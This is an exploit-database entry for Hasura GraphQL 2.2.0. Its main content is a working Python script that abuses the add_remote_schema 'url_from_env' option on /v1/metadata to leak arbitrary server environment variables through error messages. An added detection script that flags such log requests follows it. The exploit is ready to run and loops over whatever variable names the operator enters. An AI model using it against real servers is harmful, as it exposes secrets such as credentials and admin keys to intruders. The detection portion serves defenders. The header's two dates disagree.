Hasura GraphQL 2.2.0 Information Disclosure

2022.03.07
Credit: Dolev Farhi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu

import requests

SERVER_ADDR = 'x.x.x.x'

url = 'http://{}/v1/metadata'.format(SERVER_ADDR)

print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

while True:
    env_var = input('Type environment variable key to leak.\n> ')
    if not env_var:
        continue

    # add_remote_schema with url_from_env makes the server resolve the named
    # variable; its value is echoed back in the "not a valid URI" error text.
    payload = {
        "type": "bulk",
        "source": "",
        "args": [
            {
                "type": "add_remote_schema",
                "args": {
                    "name": "ttt",
                    "definition": {
                        "timeout_seconds": 60,
                        "forward_client_headers": False,
                        "headers": [],
                        "url_from_env": env_var
                    },
                    "comment": ""
                }
            }
        ],
        "resource_version": 2
    }

    r = requests.post(url, json=payload)
    try:
        print(r.json()['error'].split('not a valid URI:')[1])
    except (IndexError, KeyError):
        # Response carried no 'error' field or no URI message to split on
        print('Could not parse out VAR, dumping error as is')
        print(r.json().get('error', 'N/A'))
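For detection, the request shape above is distinctive: an `add_remote_schema` call to `/v1/metadata` whose `url_from_env` names a variable that is not one of the deployment's remote-schema URL variables. The following is an added example, not part of the original advisory or the Hasura project; the JSON-per-line proxy log format, the `client`/`path`/`body` field names, the allowlist entry `REMOTE_SCHEMA_URL` and the placeholder `EXAMPLE_SECRET_VAR` are all assumptions.

```python
import json

# Assumption: the only env vars that legitimately hold remote-schema URLs here.
ALLOWED_URL_ENV_VARS = frozenset({"REMOTE_SCHEMA_URL"})

def remote_schema_env_refs(body):
    """Yield each url_from_env named by add_remote_schema, descending into bulk."""
    if not isinstance(body, dict):
        return
    args = body.get("args")
    if body.get("type") == "bulk" and isinstance(args, list):
        for sub in args:
            yield from remote_schema_env_refs(sub)
    elif body.get("type") == "add_remote_schema" and isinstance(args, dict):
        definition = args.get("definition")
        if isinstance(definition, dict) and "url_from_env" in definition:
            yield definition["url_from_env"]

def suspicious_requests(log_lines, allowed=ALLOWED_URL_ENV_VARS):
    """Return (client, env_var) for metadata calls naming a non-allowlisted variable."""
    hits = []
    for line in log_lines:
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # skip lines that are not JSON records
        if not isinstance(rec, dict) or rec.get("path") != "/v1/metadata":
            continue
        for var in remote_schema_env_refs(rec.get("body")):
            # Non-string values are never a legitimate variable name: flag them too.
            if not isinstance(var, str) or var not in allowed:
                hits.append((rec.get("client"), var))
    return hits

# Constructed sample records (hypothetical proxy log: one JSON object per line).
SAMPLE_LOG = [
    json.dumps({"client": "198.51.100.4", "path": "/v1/metadata", "body": {
        "type": "add_remote_schema", "args": {"name": "catalog",
        "definition": {"url_from_env": "REMOTE_SCHEMA_URL"}}}}),
    json.dumps({"client": "203.0.113.7", "path": "/v1/metadata", "body": {
        "type": "bulk", "source": "", "args": [{"type": "add_remote_schema",
        "args": {"name": "ttt", "definition": {"url_from_env": "EXAMPLE_SECRET_VAR"}}}]}}),
    json.dumps({"client": "203.0.113.7", "path": "/v1/graphql", "body": {"query": "{__typename}"}}),
    "not json at all",
]

if __name__ == "__main__":
    for client, var in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT {client} referenced env var {var!r} via add_remote_schema")
```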

